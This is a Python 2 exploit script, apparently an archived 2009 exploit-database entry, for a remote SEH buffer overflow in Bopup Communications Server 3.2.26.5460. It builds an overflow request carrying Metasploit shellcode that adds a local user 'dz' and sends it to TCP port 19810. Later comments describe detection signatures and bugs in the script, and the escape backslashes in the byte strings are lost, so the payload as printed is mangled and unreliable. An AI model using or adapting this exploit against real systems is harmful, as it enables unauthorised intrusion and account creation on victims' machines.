# Title : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
# Published : 2009-06-29
# Author : His0k4
#!/usr/bin/python
#[*] Usage : python bopup.py [target_ip]
# _ _ _ __ _ _ _
#| || | (_) ___ / | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ __/ |__ |_|
#
#[*] Bug : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
#[*] Tested on : Xp sp3 (EN)(VB)
#[*] Refer : mu-b
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ)
import socket,sys,struct
from time import *
# Target host, read from argv before the argument-count check below; with no
# argument at all this line raises IndexError before the usage text is shown.
host = sys.argv[1]
def banner():
    # Print the tool banner (Python 2 print statements). The trailing "n" in
    # each literal looks like a "\n" whose backslash was lost when this copy was
    # archived; the body indentation has been restored for the same reason.
    print "n[x] Bopup Communications Server Remote BOF Exploit (SEH)n"
    print "[x] By: His0k4n"
# Usage check. Because host = sys.argv[1] is evaluated first, this branch is
# only reached when too many arguments are given, never when none are.
if len(sys.argv)!=2:
    banner()
    print "Usage: %s <ip>" %sys.argv[0]
    sys.exit(0)
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
# Payload bytes as published. Per the generator comment above, the intended
# effect on the target is the creation of a local account ("dz"), which is the
# host-side artefact a defender would look for after a successful run against
# this service. In this archived copy the "\x" escapes appear to have lost
# their backslashes ("x44x7A..."), so as written the literal is plain ASCII
# and its length no longer matches the 228-byte size stated in the comment.
shellcode=(
"x44x7Ax32x37x44x7Ax32x37x29xc9x83xe9xcdxd9xeexd9"
"x74x24xf4x5bx81x73x13x05x16xf2x06x83xebxfcxe2xf4"
"xf9xfexb6x06x05x16x79x43x39x9dx8ex03x7dx17x1dx8d"
"x4ax0ex79x59x25x17x19x4fx8ex22x79x07xebx27x32x9f"
"xa9x92x32x72x02xd7x38x0bx04xd4x19xf2x3ex42xd6x02"
"x70xf3x79x59x21x17x19x60x8ex1axb9x8dx5ax0axf3xed"
"x8ex0ax79x07xeex9fxaex22x01xd5xc3xc6x61x9dxb2x36"
"x80xd6x8ax0ax8ex56xfex8dx75x0ax5fx8dx6dx1ex19x0f"
"x8ex96x42x06x05x16x79x6ex39x49xc3xf0x65x40x7bxfe"
"x86xd6x89x56x6dxe6x78x02x5ax7ex6axf8x8fx18xa5xf9"
"xe2x75x9fx62x2bx73x8ax63x25x39x91x26x6bx73x86x26"
"x70x65x97x74x25x72x88x26x37x21xd2x29x44x52xb6x26"
"x23x30xd2x68x60x62xd2x6ax6ax75x93x6ax62x64x9dx73"
"x75x36xb3x62x68x7fx9cx6fx76x62x80x67x71x79x80x75"
"x25x72x88x26x2ax57xb6x42x05x16xf2x06")
# Request body sent to the service. With the escapes intact the layout is a
# 4-byte prefix, an 821-byte region (filler padded up to the shellcode), then
# the author's SEH-overwrite tail (27 + 5 + 8 + 4 + 4 bytes) — 873 bytes
# before the CRLF added at send time. A fixed-size request of that shape to
# TCP/19810 is the wire-level signature of this exploit. As with the shellcode,
# the literals here read as "x01x00..." in this copy, so the byte counts above
# describe the intended payload, not what this text would actually produce.
payload = 'x01x00x00x00'
payload += 'x41'*(821-len(shellcode))
payload += shellcode
payload += 'x42'*27 #padding
payload += 'xE8xFCxFExFFxFF' #Call back
payload += 'x43'*8 #padding, escaping from the x00 monster :p
payload += 'xEBxF1xFFxFF' #short jump
payload += 'xE0x14x40x00' #p/p/r bcssrvc (universal) — hard-coded address, hence the "universal" claim is specific to that module build
# Network footprint: a single TCP connection to <host>:19810, one send of the
# payload followed by CRLF (the 'rn' literal is presumably a mangled '\r\n'),
# then close. The bare `except:` discards the real connection error (refused,
# timeout, name-resolution failure) and the script still exits with status 0.
# s.send() may also transmit fewer bytes than requested; the result is unchecked.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,19810))
except:
    print "Can't connect to server!n"
    sys.exit(0)
s.send(payload+'rn')
print("[+] Done!")
s.close()